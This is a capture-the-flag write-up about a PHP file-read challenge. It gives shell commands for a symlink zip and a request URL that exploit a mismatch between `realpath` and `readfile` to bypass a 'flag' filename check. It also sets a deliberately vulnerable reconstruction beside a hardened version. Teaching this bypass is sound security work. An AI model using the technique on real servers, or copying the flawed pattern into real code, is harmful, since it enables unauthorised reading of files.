Useful characteristics of PHP functions:
* The function `realpath` expands symbolic links in the given path.
* The function `readfile` accepts a URL as the path of the file to read.

Therefore, `readfile` treats `file:///flag.txt` as a URL pointing at `/flag.txt`,
while `realpath` treats it as a file `flag.txt` in the directory `file:`.
Making `flag.txt` a symbolic link removes the string `flag` from the result of `realpath` and bypasses the check.

To exploit this, create a file `file_flag.zip` with these commands:
```
mkdir file:
cd file:
touch meow.txt
ln -s meow.txt flag.txt
cd ..
zip -ry file_flag.zip file:
```
Then upload the file and access `http://65.108.176.76:8200/?file=file:///flag.txt` to get the flag.
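
The mismatch described above comes from validating one interpretation of the input (`realpath`) and reading another (`readfile` on the raw string). The following is an added example, not the challenge's source, which is not shown in this write-up: `serve_vulnerable`, `serve_hardened` and the `$baseDir` parameter are hypothetical names, and the vulnerable function is only a reconstruction of the check as described.

```php
<?php
// Added example. The challenge source is not on the page; both functions are
// hypothetical reconstructions used to contrast the flawed and fixed patterns.

// Flawed pattern: the check runs on realpath($input), the read on $input.
function serve_vulnerable(string $input): void
{
    // "file:///flag.txt" is resolved as the relative path file:/flag.txt,
    // and a symlink there is expanded to its target's name.
    $resolved = realpath($input);
    if ($resolved === false || strpos($resolved, 'flag') !== false) {
        http_response_code(403);
        return;
    }
    // The raw string goes to the file:// stream wrapper, i.e. /flag.txt.
    readfile($input);
}

// Hardened pattern: refuse wrapper syntax, confine the canonical path to a
// base directory, and read the same canonical path that was validated.
function serve_hardened(string $input, string $baseDir): void
{
    // Defence in depth: a "scheme://" prefix is stream-wrapper syntax.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $input)) {
        http_response_code(400);
        return;
    }
    $base = realpath($baseDir);
    $resolved = $base === false
        ? false
        : realpath($base . DIRECTORY_SEPARATOR . $input);
    $prefix = rtrim((string) $base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($resolved === false
        || strncmp($resolved, $prefix, strlen($prefix)) !== 0
        || !is_file($resolved)) {
        http_response_code(403);
        return;
    }
    // An absolute, symlink-free path: no wrapper parsing, no second meaning.
    readfile($resolved);
}
```

With the hardened form, a symlink inside the upload directory yields only the contents of its in-directory target, and a link pointing outside `$baseDir` fails the prefix check. Where uploaded archives are extracted, refusing symlink entries removes the other half of the trick.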